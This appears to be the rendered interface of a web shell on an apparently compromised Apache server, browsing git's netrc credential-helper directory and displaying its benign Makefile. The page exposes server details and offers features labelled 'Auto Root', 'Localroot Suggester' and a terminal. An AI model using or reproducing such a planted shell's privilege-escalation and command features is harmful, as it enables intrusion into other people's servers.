Linux tsuru-no-tsurugi 5.15.0-186-generic #196-Ubuntu SMP Sat Jun 20 16:09:34 UTC 2026 x86_64
Apache/2.4.52 (Ubuntu)
Server IP : 192.168.0.18 & Your IP : 216.73.216.68
Domains :
Cant Read [ /etc/named.conf ]
User : www-data
Terminal
Auto Root
Create File
Create Folder
Localroot Suggester
Backdoor Destroyer
Readme
/
usr /
share /
doc /
git /
contrib /
credential /
netrc /
Delete
Unzip
Name
Size
Permission
Date
Action
Makefile
694
B
-rw-r--r--
2021-11-25 04:29
git-credential-netrc.perl
10.61
KB
-rw-r--r--
2021-11-25 04:29
t-git-credential-netrc.sh
665
B
-rw-r--r--
2021-11-25 04:29
test.command-option-gpg
75
B
-rw-r--r--
2021-11-25 04:29
test.git-config-gpg
71
B
-rw-r--r--
2021-11-25 04:29
test.netrc
337
B
-rw-r--r--
2021-11-25 04:29
test.pl
4.12
KB
-rw-r--r--
2021-11-25 04:29
Save
Rename
# The default target of this Makefile is... all:: SCRIPT_PERL = git-credential-netrc.perl GIT_ROOT_DIR = ../../.. HERE = contrib/credential/netrc SCRIPT_PERL_FULL = $(patsubst %,$(HERE)/%,$(SCRIPT_PERL)) all:: build build: $(MAKE) -C $(GIT_ROOT_DIR) SCRIPT_PERL="$(SCRIPT_PERL_FULL)" \ build-perl-script install: build $(MAKE) -C $(GIT_ROOT_DIR) SCRIPT_PERL="$(SCRIPT_PERL_FULL)" \ install-perl-script clean: $(MAKE) -C $(GIT_ROOT_DIR) SCRIPT_PERL="$(SCRIPT_PERL_FULL)" \ clean-perl-script test: build ./t-git-credential-netrc.sh testverbose: build ./t-git-credential-netrc.sh -d -v .PHONY: all build install clean test testverbose